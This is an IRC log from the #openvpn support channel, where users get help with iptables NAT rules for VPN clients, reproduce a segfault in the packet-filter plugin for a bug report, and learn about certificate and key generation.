I start to get it. So for starters: I did not buy the pulic IP block in vain?! right. I still need it?! 10:24 < pulz> so long i dont daemonize it 10:25 < MacGyver> pulz: Tentative yes... But what are you and aren't you seeing? Can you pastebin your output somewhere? 10:25 <@dazo> latenite: iptables -t nat -I PREROUTING -i eth0 -d 5.9.243.146 -j DNAT --to-destination 10.8.0.2 <<<--- this tells that connections to 5.9.243.146 should go to 10..8.0.2 on your inside net 10:25 < latenite> dazo, it's just that I *ALSO* need SNAT/DANT to map between the IPs? Did I get that right?! 10:26 <@dazo> latenite: iptables -t nat -I POSTROUTING -i tun0 -s 10.8.0.2 -j SNAT --to-source 5.9.243.146 <<<--- this tells that connections from 10.8.0.2 should use the public IP address 5.9.243.146 10:26 <@dazo> notice the changes between PRE/POST routing, -d and -s, DNAT and SNAT and the --to-destination vs --to-source 10:27 < latenite> dazo, yes :D kind of makes sense a little now. 10:27 < pulz> MacGyver: im guessing i should see a hint of pushing or error that my command is not correct http://pastebin.com/CeX5K2Uj 10:27 < latenite> dazo, For a minute I though I could have done it without the public IPs. Can you confirm that this is not the case?! 10:28 <@dazo> latenite: depends on what your goal is 10:29 < latenite> dazo, my goal is for the client to connect to the OpenVPN and be able to use the internet on any ports 10:29 <@dazo> latenite: do you want your VPN clients to access services on the Internet via the VPN tunnel? If yes, then you need to use DNAT/SNAT or MASQUERADE (depending on if you want dedicated public IP addresses for each VPN client or if all can use the same public IP address) .... or if you just want VPN clients to only access an internal network 10:30 <@dazo> latenite: ahh, okay ... so for public Internet access, then you need either DNAT/SNAT *or* MASQUERADE ... depending on if you want separate public IPs for VPN clients or not 10:30 < latenite> dazo, I dont even have an internel network yet. Its just the bare host with the VM that runs openvpn. 10:31 <@dazo> well, internal network can just as well be services on the VPN server ... only accessible via the VPN 10:31 <@dazo> (but that's nitpicking again) 10:32 < latenite> dazo, I am not sure if I need them to have separate public IPs.. ?! I *only thought* it had to be liek that. 10:33 < latenite> dazo, How would I reach the different clients from the outside world if they where only represented by a single IP ? 10:33 <@dazo> then you can make it a lot easier, if you don't need separate IPs .... just ditch the SNAT/DNAT rules .... and use: iptables -I POSTROUTING -o eth0 -s 10.8.0.0/24 -j MASQUERADE 10:33 <@dazo> and that's it 10:33 < latenite> dazo, is there a downside to MASQUERADE ? 10:34 <@dazo> latenite: you can't basically in a typical MASQUERADE setup ... you then need separate DNAT/SNAT rules in pairs 10:34 <@dazo> you can't access VPN clients from the outside using MASQ, that's what I tried to say :) 10:34 < MacGyver> pulz: That's the server output, right? 10:34 < MacGyver> pulz: Do you have client output as well? 10:35 <@dazo> latenite: so that's the "downside" ... depends on what you want to provide to your clients 10:35 < latenite> dazo, ohh ok. So DNAT/SNAT is what I realy need 10:35 < MacGyver> pulz: And, perhaps, is the client using an ifconfig-directive? 10:35 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 10:35 <@dazo> latenite: read the DNAT and SNAT sections in the iptables man page carefully .... and you'll see how you can map this better 10:35 < latenite> dazo, I basicly want my clients to be "free" servers on the internet to host services and be reachable 10:36 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:36 <@dazo> latenite: do you care about VPN client security? I mean, do you want to or need to firewall traffic hitting the VPN clients? Or are they "customers" which needs to cover their own a**es? 10:37 < latenite> dazo, thank you tons for getting the basics to me. I am such a rooky when it comes to that sort of stuff :D 10:37 < pulz> MacGyver: thats client 10:37 <@dazo> latenite: if you need to care for the VPN client security .... then I'd add single PREROUTING/DNAT rules per port the clients would only forward those ports the clients uses for public services 10:37 < latenite> dazo, second one. I dont care if they are exposed to the nastyness of the net 10:38 < MacGyver> dazo: That's unnecessarily complicating things. 10:38 < MacGyver> dazo: You don't *need* NAT to firewall those clients. 10:38 <@dazo> latenite: okay ... then not filtering is the proper way 10:38 < MacGyver> dazo: You can fix this with iptables on the server while still using public IP's. 10:38 <@dazo> MacGyver: I wear my tinfoil-hat everyday ... even sleep with it 10:39 < MacGyver> dazo: Then you should know that NAT adds *no* security. 10:39 * dazo is paranoid by nature when it comes to the Internet 10:39 < latenite> dazo, so thats protecting the (say httpd client) by filtering only 80,443 on the vpn side? Did I get that right!? 10:39 <@dazo> MacGyver: NAT is no security ... but not forwarding ports the VPN clients don't listen to or are supposed to be accessed on, reduces the VPN traffic and protects the VPN clients from those attempts 10:40 < latenite> dazo, this will be my fist time setting up filter rules. And I have a general question befor I start to read/play with iptables... 10:40 <@dazo> MacGyver: as those attempts will then hit the INPUT rule on the VPN server instead afterwards 10:40 < MacGyver> dazo: Yes, but my point is that latenite can perfectly use his external IP's on the client as long as he's got the iptables-firewall setup on the server. 10:40 < latenite> ...my VM is a LXC (linux container) which uses the hosts kernel. 10:41 < MacGyver> dazo: You don't *have* to use MASQUERADE rules to have an effective block in iptables. 10:41 <@dazo> MacGyver: true 10:41 < MacGyver> To which I should add that iptables is a huge mindf*ck and I personally prefer to use a decent set of frontend-scripts like shorewall. 10:42 < pulz> MacGyver: i atleast managed to verify that the settings are applied, just tested for fun and its giving me 3 Options error: Unrecognized option or missing parameter(s) in [PUSH-OPTIONS]:10: ipconfig-push (2.2.1) 10:42 < latenite> ...so will my iptables setup in the VM(lxc) also effect the host? Since its the same kernel and iptables is kernel based? 10:42 <@dazo> nah ... iptables rules are easy :) 10:42 < MacGyver> pulz: Uhm. 10:42 < MacGyver> pulz: Shouldn't that be ifconfig-push, even though you might be on windows? 10:42 < latenite> Like what if I had 3 VMs with different iptables rules? Would that work? 10:43 < pulz> MacGyver: the client is running linux, so that might be the case 10:43 < MacGyver> dazo: Yes, they're easy, and easy to get wrong, but that's personal preference. 10:43 < MacGyver> latenite: Yes that would work. 10:43 < MacGyver> latenite: The way you would set this up... 10:44 <@dazo> MacGyver: yeah ... I've been doing firewalling with Linux since ipfwadm -> ipchains and then iptables .... so my brain is iptables native compatible :) 10:44 < latenite> dazo, :D great. 10:45 < latenite> ipfwadm -> I just had to google that :/ 10:45 <@dazo> latenite: don't ever bother about ipfwadm ... it disappeared with Linux 2.0 kernels 10:45 < MacGyver> latenite: You'd have your ISP routing that public subnet to you. I don't know if that's hooked directly to your VPN server, but for the sake of clarity I'll assume that subnet gets routed directly to the VPN server. Then, the VPN server is running iptables and drops *everything* directed at *everything*, except for a few rules of traffic directed at specific IP-addresses in the VPN-range for the host servers. 10:46 <@dazo> latenite: 2.2 kernels came with ipchains ... and 2.4 and further shipped iptables 10:46 < MacGyver> Then it routes that subnet onward into the actual VPN, with clients using the public subnet provided by the ISP. 10:46 < MacGyver> No NATting is done and it's just as secure. 10:49 < MacGyver> Of course, if you need more clients than your public subnet provides (it was a /29, right? So that's 6 usable addresses, unless my brain is screwing with me), then other options become interesting, such as using SNAT / DNAT for a subset of an internal RFC1918 network and MASQUERADE for the rest. 10:51 < latenite> MacGyver, dazo yes I need more that just one client. 10:51 < MacGyver> latenite: But do you need more than 6? 10:52 < latenite> MacGyver, maybe. 10:52 < latenite> If I could have some friend use the vpn to tunnel the campus wifi..that would be cool 10:53 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 10:53 <@dazo> and probably breaking some rules for the usage of the wifi net .... 10:54 < latenite> but for started I d be happy to have a workinf setup at . One that gets my laptop to use the internt trough the vpn. So i am no longer imprisonated in that campus wifi that only allows port 80,443 10:54 -!- [Xaronic] [~Xaronic]@occupyuk.co.uk] has quit [Quit: Quit] 10:54 < latenite> dazo, I actually asked the it helpcenter. They said its ok for me to do 10:56 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 10:56 < latenite> ...so for starters I just read up on iptables now...to get me up to par to actually set up SNAT/DNAT 10:56 < latenite> dazo, MacGyver did you read my LXCvs. iptables question? 10:57 <@dazo> latenite: I don't have any hands-on experience with LXC ... but if I've understood it correctly, it should work just fine 10:57 < latenite> What id I have multiple LXCs with different iptable rules? 10:57 <@dazo> should be fine, as they are different containers 10:58 < latenite> dazo, ok so its 3am and I have surf class in 5 hours. Thats bad and cool at the same time :D 10:58 <@dazo> latenite: hopefully the water will be cold, so you'll wake up ;-) 10:58 < latenite> I ll go to bed and learn how to use iptables on the weekend 10:59 < latenite> dazo, they have sea fleas. nasty things. I did not even know such things exist until I came to australia :D 11:00 <@dazo> ugh 11:00 < latenite> the just itch. bad thing though....they get in *everywhere* :D 11:00 < latenite> you dont want to know :D 11:01 * dazo tries to think about something completely different now ..... :-P 11:01 < latenite> Still, me comming from a place where we dont surf ...its good fun 11:02 < latenite> dazo, so thanks again. I know have a plan on what to do. 11:02 <@dazo> no worries! 11:02 < latenite> dazo, you wouldn't habe a good link to get me started with iptables. Google is flooded, I know. But That makes it hard to pick the good stuff 11:03 <@dazo> latenite: I'd probably ask in #netfilter 11:03 <@dazo> for me the "easy stuff" is probably way too advanced for beginners 11:03 < latenite> dazo, #netfilter is the official iptables channel? 11:04 <@dazo> yeah 11:04 <@dazo> iptables is just the front-end to the kernel netfilter code 11:04 -!- AsadH is now known as zz_AsadH 11:04 <@dazo> or rather, one of the front-ends to netfilter 11:04 < latenite> 1st thing learned already :D 11:04 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Quit: mirco] 11:05 < latenite> cool then, that will be te first thing I'll do after lunch tommorow. 11:05 <@dazo> latenite: this might be a good starter ... http://www.linuxjournal.com/article/4815?page=0,1 11:05 <@vpnHelper> Title: Taming the Wild Netfilter | Linux Journal (at www.linuxjournal.com) 11:05 <@dazo> but those stuff is quite old these days 11:06 < latenite> y'all have pleasent day 11:06 <@dazo> u2 11:06 < latenite> dazo, now that you linked that to me...I can't but read it as my night lecture :D 11:07 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn 11:11 <@dazo> latenite: well, since you're still here ... this one looks a bit more comprehensive .... http://www.frozentux.net/iptables-tutorial/iptables-tutorial.html#IPFILTERING 11:11 <@vpnHelper> Title: Iptables Tutorial 1.2.2 (at www.frozentux.net) 11:11 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 11:12 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 256 seconds] 11:17 < latenite> dazo, thx :D more for the weekend 11:17 < latenite> dazo, so for starterd I could just try to block pings, right?! 11:18 <@dazo> latenite: that's probably the safest place to start playing, esp if you don't have a console access to the box not depending on ssh 11:25 < latenite> dazo, actually I have ssh access to the VMs. I am just scared of my inital idea of : rules effecting the host because I use LXC and not a real VM 11:26 <@dazo> latenite: that's what I meant ... you should see if you could have a different "backdoor" ... like a serial console via an admin page at your VM provider 11:26 <@dazo> the serial console will then be unrelated to the networking stuff ... so if you really mess it up, you can fix it via the serial console log-in 11:28 < latenite> dazo, I do. I have a RDP thing with external IP and also a way ro reboot with a rescue system. So I sould be fairly safe to make mistakes 11:28 <@dazo> ahh, good! 11:29 < latenite> ...I am not tired, but I'd hate myself if I dont sleep now. 11:29 < latenite> dazo, are you around on the weekend? 11:30 <@dazo> latenite: probably not ... but I'm quite sure #netfilter guys will be more than helpful 11:30 <@ecrist> wow, dazo being all helpful and such. this is an odd day 11:30 < latenite> dazo, cool then. I ll be around. I guess this vpn thing will keep me busy the next few days/weeks 11:31 * dazo slaps ecrist with a trout 11:31 <@dazo> ;-) 11:31 <@ecrist> THERE'S the dazo I know and love. 11:31 <@dazo> lol 11:34 < MacGyver> latenite: Regarding LXC with iptables: I prefer to setup iptables on the host only. 11:35 < MacGyver> latenite: But if that's not an option, my understanding is that it *should* work. 11:35 <@dazo> MacGyver: he's a LXC customer 11:35 -!- latenite [~latenite@138.77.121.79] has quit [Ping timeout: 260 seconds] 11:35 -!- latenite [~latenite@138.77.121.79] has joined #openvpn 11:36 < MacGyver> dazo: I also use LXC, I just prefer to setup iptables on the host only and route all traffic through that. 11:36 -!- Mcloven__ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 11:36 < MacGyver> dazo: But none of my containers run something like openVPN, i.e. none of my containers act as a router. 11:36 <@dazo> MacGyver: yeah, but if you buy a "VM" from a hosting provider giving you an LXC ... you probably won't be allowed to play with the host iptables rules 11:36 < MacGyver> Ah, right, "customer" like that. 11:37 < MacGyver> Yeah, I understand it should work. 11:37 < MacGyver> But I've never had to test it. 11:38 <@dazo> yeah, me neither ... well, I've seen demos of it, especially on Fedora 18 combined with systemd and SELinux containers ... and that's pretty impressive 11:38 <@dazo> (Dan Walsh even "booted" up a Debian user space in such an LXC running on Fedora 18) 11:40 -!- latenite [~latenite@138.77.121.79] has quit [Ping timeout: 252 seconds] 11:41 -!- master_of_master [~master_of@p4FF24E11.dip.t-dialin.net] has joined #openvpn 11:41 -!- zach__ [~zach@nat-192-95-29-123.bhs1.montreal.qbc.ca.nuked.co] has joined #openvpn 11:42 -!- latenite [~latenite@138.77.121.79] has joined #openvpn 11:43 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has quit [Ping timeout: 248 seconds] 11:43 < latenite> dazo, MacGyver I am a "customer" to my own root-server that has LXCs. I could have went for kvm also. 11:44 * dazo would have gone for the KVM solution, though 11:44 <@dazo> that gives you real root privileges 11:44 <@dazo> (on your VM, that is) 11:44 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 11:44 -!- mattock is now known as mattock_afk 11:45 -!- Netsplit *.net <-> *.split quits: master_o1_master, jave_, zach, Mcloven_ 11:48 -!- latenite [~latenite@138.77.121.79] has quit [Ping timeout: 252 seconds] 11:50 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 11:50 -!- latenite [~latenite@138.77.121.79] has joined #openvpn 11:51 < latenite> dazo, hmm I keep getting disconnected... 11:52 < latenite> sorry 11:52 < latenite> I all just sleep now. 11:52 < latenite> later :D 11:52 -!- latenite [~latenite@138.77.121.79] has quit [Client Quit] 11:55 -!- Dennis84 [~dennis@mail.it-moebius.de] has joined #openvpn 11:55 < Dennis84> hi all 11:57 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:02 < Dennis84> can somebody tell me, if this patch is in the actual trunk for future stable versions? 12:02 < Dennis84> https://community.openvpn.net/openvpn/ticket/163#comment:4 12:02 <@vpnHelper> Title: #163 (Segfault in PF) – OpenVPN Community (at community.openvpn.net) 12:05 -!- smerz [~smerz@a177088.upc-a.chello.nl] has joined #openvpn 12:08 <@dazo> Dennis84: it's not understood *why* that *pfs pointer is NULL ... so that needs to be understood before we can commit it 12:08 <@dazo> as stated in comment #2 .... 6 months ago .... and I've not seen any attempts to try to dig into that 12:09 <@dazo> I vaguely remember tracing the code paths manually ... and iirc, at that time I couldn't understand how *pfs could be NULL 12:15 < Dennis84> dazo: hm i understand that this is a workaround 12:15 < Dennis84> but isn't it better to have no crash with workaround or you have a crash without? 12:15 <@dazo> Dennis84: yes, and we don't commit workarounds .... that doesn't really solve anything ... unfortunately, most of us who develop openvpn stuff now barely have time to scratch our own itches in OpenVPN ... 12:16 <@dazo> the worst thing which happens with workarounds is that, f.ex. a buffer overflow somewhere else gets hidden due to such fixes ... that will can cause greater pains later on 12:16 <@dazo> So it is needed to fully understand why this unexpected scenario happens 12:16 -!- master_o1_master [~master_of@p4FF24C6C.dip.t-dialin.net] has joined #openvpn 12:17 <@dazo> otherwise a hidden buffer overflow may again later bite us back as a security issue 12:17 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has quit [Quit: Computer has gone to sleep.] 12:17 -!- master_of_master [~master_of@p4FF24E11.dip.t-dialin.net] has quit [Read error: Operation timed out] 12:17 <@dazo> So in that context ... yes, a crash is better 12:18 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 264 seconds] 12:19 -!- catsup [~d@64.111.123.163] has joined #openvpn 12:19 < Dennis84> dazo: ok i understand 12:20 < Dennis84> i think you dont have time to solve such an issue, because there are other parts you have to work on 12:20 <@dazo> that's also true 12:20 < Dennis84> but is there a possibility, that this problem get fixed in a specific time? 12:20 < Dennis84> i know, that this is a very detailed problem 12:21 <@dazo> whenever someone comes up with a good thesis and a patch which covers that thesis 12:21 <@dazo> But if you want a specific time ... I'm sure we've solved this by the end of 2099 12:22 < Dennis84> ;) 12:22 < Dennis84> ok 12:22 < Dennis84> i dont want to be angry ;) 12:22 <@dazo> :) 12:22 < Dennis84> you all do a great work 12:22 < Dennis84> :) 12:25 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds] 12:25 < Wulf> Dennis84: do you suffer from that problem? 12:25 -!- catsup [~d@64.111.123.163] has joined #openvpn 12:28 < Wulf> Dennis84: if so, are you able to reproduce the problem? Can you provide detailed instructions so that someone else can also reproduce it? 12:31 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 12:32 -!- catsup [~d@64.111.123.163] has joined #openvpn 12:35 < Dennis84> Wulf: yes, i had this problem month ago and i can tell how to reproduce it 12:36 < Dennis84> i compiled openvpn with this patch, since this i have no errors 12:36 < Dennis84> or segfaults 12:36 < Wulf> Dennis84: okay. How? :) 12:38 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 12:38 -!- catsup [~d@64.111.123.163] has joined #openvpn 12:39 < Dennis84> Wulf: first you have to compile the plugin 12:39 < Dennis84> http://backreference.org/2010/06/18/openvpns-built-in-packet-filter/ 12:39 < Wulf> which one? 12:39 < Dennis84> this is the howto i followed 12:40 < Dennis84> i dont know, if its a problem that you follow the howto 12:40 < Dennis84> and i give you my specific configs 12:41 < Wulf> Dennis84: how should I know if it's a problem? 12:42 < Dennis84> i dont know if you can follow the howto or if you want i tell you everything you have to do ;) 12:44 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 12:44 -!- catsup [~d@64.111.123.163] has joined #openvpn 12:45 < Wulf> Dennis84: okay, I compiled the plugin 12:47 < Dennis84> ok 12:48 < Dennis84> first you need a client-connect-script 12:48 < Wulf> Dennis84: can you make be a tarball for all required openvpn config? 12:48 < Wulf> scripts, etc 12:49 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 264 seconds] 12:50 < Dennis84> Wulf hmm i think its easier to tell you 12:50 < Dennis84> because to have to define the settings for your clients specific 12:51 -!- catsup [~d@64.111.123.163] has joined #openvpn 12:51 < Dennis84> but i think i can tell in 5 minues 12:51 < Wulf> okay... 12:51 < Dennis84> so, you have to create the client-connect script like mentioned in the howto 12:52 < pekster> If you attach all this info as another comment/attachment to the bug, it's likely to get more attention 12:53 < pekster> There are possibly developers interested (or who will eventually be interested) in fixing it that may not be in IRC right now, and a tarball + description on the bugreport is a more permenant way to describe a reproduction method 12:53 <@dazo> pekster++ 12:54 < Dennis84> ok 12:54 < Dennis84> i will try 12:57 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 12:57 -!- catsup [~d@64.111.123.163] has joined #openvpn 12:57 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 248 seconds] 13:03 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 13:03 -!- catsup [~d@64.111.123.163] has joined #openvpn 13:05 < Dennis84> Wulf: i attached the file 13:06 < Dennis84> you have to check 2 directories 13:06 < Wulf> Dennis84: thanks! 13:06 < Dennis84> allccd 13:06 < Dennis84> and pf 13:06 < Dennis84> in every directory you need a file which contains the client-cert name 13:07 < Dennis84> you see an example 13:07 < Dennis84> in everydirectory 13:07 < Dennis84> no Wulf 13:07 < Dennis84> i have to say thank you! 13:07 < Wulf> huh? 13:08 < Wulf> ah 13:08 < Wulf> what do you mean by "client-cert name"? 13:09 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 252 seconds] 13:09 < Dennis84> you can define special settings for every client 13:09 < Wulf> Dennis84: don't want to 13:09 < Dennis84> Wulf: yes, but you have to create a pf file for every client 13:10 < Wulf> Dennis84: can you not include that? 13:10 < Dennis84> Wulf: i dont know you client-cert names? ;) 13:10 -!- catsup [~d@64.111.123.163] has joined #openvpn 13:10 < Wulf> Dennis84: I don't have any 13:10 < Dennis84> what? how do your clients connect and auth? 13:11 <@dazo> There are some example certs in the source tree you can use for such testing 13:11 < Wulf> Dennis84: you're missing the point. YOU have to provide complete configuration, including certificates, keys, etc. 13:11 <@dazo> http://openvpn.git.sourceforge.net/git/gitweb.cgi?p=openvpn/openvpn-testing.git;a=tree;f=sample/sample-keys;h=67d4abf9a9a50c5969bc6b712a5aa1911b743566;hb=master 13:11 <@vpnHelper> Title: SourceForge - openvpn/openvpn-testing.git/tree - sample/sample-keys/ (at openvpn.git.sourceforge.net) 13:12 < Wulf> so I basically have to change the "remote" setting in the client configs 13:13 < Dennis84> Wulf: sorry, i thought you would like to test with active users 13:13 < Dennis84> and only change the config 13:13 < Wulf> Dennis84: nope, I would set up a test environment for this 13:14 < Dennis84> Wulf: ok give me 5 minutes 13:16 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 13:16 -!- catsup [~d@64.111.123.163] has joined #openvpn 13:22 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 13:22 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 13:23 -!- catsup [~d@64.111.123.163] has joined #openvpn 13:28 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds] 13:29 -!- catsup [~d@64.111.123.163] has joined #openvpn 13:31 < Dennis84> Wulf: uploaded again 13:31 < Dennis84> hope this works now 13:31 -!- MeanderingCode_ is now known as MeanderingCode 13:33 < Wulf> Dennis84: at least looks better 13:34 < Wulf> Dennis84: 32 or 64 bit? 13:34 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds] 13:35 -!- catsup [~d@64.111.123.163] has joined #openvpn 13:35 < Dennis84> Wulf: 64bit 13:37 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Max SendQ exceeded] 13:37 -!- dazo is now known as dazo_afk 13:40 < Wulf> Dennis84: it's the server that crashes? 13:41 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 13:41 -!- catsup [~d@64.111.123.163] has joined #openvpn 13:45 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 13:46 -!- Porkepix [~Porkepix@157.138.76.100] has joined #openvpn 13:46 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds] 13:48 -!- catsup [~d@64.111.123.163] has joined #openvpn 13:53 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds] 13:54 -!- catsup [~d@64.111.123.163] has joined #openvpn 13:59 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 252 seconds] 14:00 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:02 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 14:05 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 14:06 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:06 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 14:09 -!- Orbi [~opera@anon-147-110.vpn.ipredator.se] has joined #openvpn 14:09 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Client Quit] 14:10 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Ping timeout: 260 seconds] 14:10 -!- DucsSlack [~desade@24-117-207-111.cpe.cableone.net] has joined #openvpn 14:10 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn 14:11 < Wulf> Dennis84: there's an encrypted private key ;) 14:12 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 14:12 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:15 < pekster> Wulf: If it's from the openvpn-testing git project, the readme says the password is merely "password" and it looks like only the 'pass.key' is protected 14:15 < pekster> All the others (ca, server, & client) all are unencrypted 14:15 < Wulf> ah, thanks :) 14:18 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 252 seconds] 14:19 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:21 -!- smerz [~smerz@a177088.upc-a.chello.nl] has quit [Ping timeout: 264 seconds] 14:21 < Dennis84> Wulf: yes, this server crashes 14:21 < Dennis84> but maybe you need more clients 14:22 < Dennis84> if the server does not crash, i generate you more clients 14:22 < Wulf> Dennis84: I have trouble running your config 14:22 < Dennis84> Wulf: why? 14:22 < Wulf> bad CN in the client certs I guess 14:23 < Dennis84> hmm is it not possible ro rename them? 14:24 < Wulf> Thu Mar 7 20:24:22 2013 VERIFY X509NAME ERROR: /C=KG/ST=NA/O=OpenVPN-TEST/CN=Test-Server/emailAddress=me@myhost.mydomain, must be server 14:25 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 14:25 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:26 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Changing host] 14:26 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has joined #openvpn 14:31 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 255 seconds] 14:31 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:37 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds] 14:38 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:39 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 14:39 -!- mode/#openvpn [+v s7r] by ChanServ 14:41 -!- smerz [~smerz@a177088.upc-a.chello.nl] has joined #openvpn 14:42 -!- DucsSlack is now known as ducblangis 14:43 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 14:44 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:49 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 255 seconds] 14:50 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:55 -!- cafaroo [gustaf@c213-89-175-69.bredband.comhem.se] has joined #openvpn 14:56 < Wulf> Dennis84: Segmentation fault 14:56 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 14:56 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:56 < cafaroo> Hi! First time using openVPN and i generated keys with puttyGEN how can i convert them to use with openVPN? 14:57 < Wulf> cafaroo: how is putty related to openvpn? 14:57 < Wulf> cafaroo: putty is an ssh client, that's a completely different key format 14:58 < cafaroo> I dont know my networktech told me to create keys and that was the only way i knew how.. Now he says he created so many keys for me in the server that im on my own :S 14:58 < cafaroo> I know but there must be some way to convert right? 14:58 < pekster> Well, technically you can generate a CSR from a private RSA key pair that putty's tools can generate, but you can't do it with putty alone. You need to use openssl (or another high-level tool) anyway 14:59 < pekster> What you really want is a tool like Easy-RSA or XCA to generate a keypair and signing request (CSR or sometimes called a ".req" after a common file extension used by this format) 14:59 < cafaroo> Just my luck... I have ssh access to the server now trough putty can i add keys by myself? 14:59 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 14:59 < cafaroo> SSorry if im asking dumb questions but i havent really used keys at all before.. 14:59 < pekster> cafaroo: ssh access to what, your OpenVPN server? 15:00 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 15:00 < cafaroo> Yes 15:00 < pekster> You should follow the official OpenVPN howto then as it has an entire section describe the PKI setup, including key generation 15:00 < pekster> !howto 15:00 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 15:01 < cafaroo> I tried that but the whole company is on the server so i really dont want to make a trail and error run as i usally do. Specially since i've been working there for about 3 days :P 15:01 < cafaroo> Anyway ill go back to google! Thanks for the help m8 :) 15:01 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 252 seconds] 15:02 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:03 < Dennis84> Wulf: ok :) 15:03 < Wulf> Dennis84: it's easy to reproduce by letting client1 connect, and kill/start client2 until it crashes 15:03 < pekster> The "short" answer is that no, puttyGen cannot generate a proper PKI for you. All it does is generate an RSA keypair, which is only one "step" in the process of generating a certificate 15:04 <@EugeneKay> If you want a GUI PKI management, XCA is the tool. 15:04 < pekster> Use one of the tools I mentioned above, unless you have an advanced understanding of X509 and PKI and wish to manage the interaction between the keypair, CSR, and signing steps by yourself 15:04 < Wulf> Dennis84: valgrind returns nothing useful, so it's likely not a buffer overflow but a logic error 15:05 < cafaroo> But m8 15:06 < Dennis84> Wulf: ok 15:06 < Dennis84> i go to bed now 15:06 < Dennis84> maybe we can talk tomorrow 15:06 < cafaroo> pkster:I have certificates that he created for me allready. ca.crt and myname.crt 15:06 < Dennis84> thanks for your help! 15:06 < Dennis84> good night 15:07 < cafaroo> pkster: Im just trying to put in a new.key file. But i dont know if its possible. 15:07 < pekster> cafaroo: The certificate (.crt file) is tied to your private key. It is a *keypair* and the pair comes from the initial generation process. You cannot use a different private key with an issued certificate 15:07 < pekster> A certificate is just the public key with some extra data added by the CA to sign and verify that the CA has "approved" the request 15:08 < cafaroo> Hmm okay! So the only thing to do is to erase this key. Create a new one with easy-rsa then. 15:08 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 15:08 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 15:08 < pekster> How did you get the myname.crt file? During the generation process of the keypair, you would have ended up with a matching private key 15:08 < pekster> The vpn client needs both components, plus the ca.crt file 15:09 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:09 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out] 